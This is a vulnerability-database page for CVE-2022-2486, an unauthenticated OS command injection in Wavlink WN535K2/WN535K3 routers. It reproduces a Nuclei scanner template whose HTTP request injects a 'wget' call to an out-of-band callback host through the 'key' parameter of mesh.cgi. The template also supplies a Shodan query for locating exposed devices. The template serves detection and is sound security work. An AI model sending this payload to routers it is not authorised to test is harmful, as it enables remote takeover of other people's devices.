Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nucleiProjectDiscoveryNUCLEI:CVE-2022-2486
HistoryJul 20, 2022 - 6:14 p.m.

Wavlink WN535K2/WN535K3 - OS Command Injection

2022-07-2018:14:49
ProjectDiscovery
github.com
10
cve-2022-2486
wavlink
router
command injection
iot
remote code execution
osast

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

10

Confidence

High

EPSS

0.973

Percentile

99.9%

JSON
Wavlink WN535K2 and WN535K3 routers are susceptible to OS command injection in an unknown part of the file /cgi-bin/mesh.cgi?page=upgrade via manipulation of the argument key. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.

id: CVE-2022-2486

info:
  name: Wavlink WN535K2/WN535K3 - OS Command Injection
  author: For3stCo1d
  severity: critical
  description: |
    Wavlink WN535K2 and WN535K3 routers are susceptible to OS command injection in an unknown part of the file /cgi-bin/mesh.cgi?page=upgrade via manipulation of the argument key. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire network.
  remediation: |
    Apply the latest firmware update provided by the vendor to mitigate this vulnerability.
  reference:
    - https://github.com/1angx/webray.com.cn/blob/main/Wavlink/Wavlink%20mesh.cgi.md
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2486
    - https://vuldb.com/?id.204537
    - https://nvd.nist.gov/vuln/detail/CVE-2022-2486
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-2486
    cwe-id: CWE-78
    epss-score: 0.97331
    epss-percentile: 0.99885
    cpe: cpe:2.3:h:wavlink:wl-wn535k2:-:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: wavlink
    product: wl-wn535k2
    shodan-query: http.title:"Wi-Fi APP Login"
  tags: cve2022,cve,iot,wavlink,router,rce,oast

http:
  - raw:
      - |
        GET /cgi-bin/mesh.cgi?page=upgrade&key=;%27wget+http://{{interactsh-url}};%27 HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"

      - type: status
        status:
          - 500
# digest: 4b0a0048304602210099cf7b401d12d74ed6b3e3cb7843ae70994f0020a30ef42cae07410922e0d799022100c732b7f6cb38a4fdb450bf0c3f513ea4197bf67458c16c953bb5842e6f30a2b8:922c64590222798bb761d5b6d8e72950

Related

nvd 1
cve 1
prion 1
cvelist 1
checkpoint_advisories 1
nvd
nvd
CVE-2022-2486
2022-07-20 12:15:08
cve
cve
CVE-2022-2486
2022-07-20 12:15:08
prion
prion
Command injection
2022-07-20 12:15:00
cvelist
cvelist
CVE-2022-2486 WAVLINK WN535K2/WN535K3 os command injection
2022-07-20 11:35:21
checkpoint_advisories
checkpoint_advisories
Wavlink Routers Command Injection (CVE-2022-2486; CVE-2022-2488)
2022-11-06 00:00:00

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

10

Confidence

High

EPSS

0.973

Percentile

99.9%

JSON
Related for NUCLEI:CVE-2022-2486
nvd1cve1prion1cvelist1checkpoint_advisories1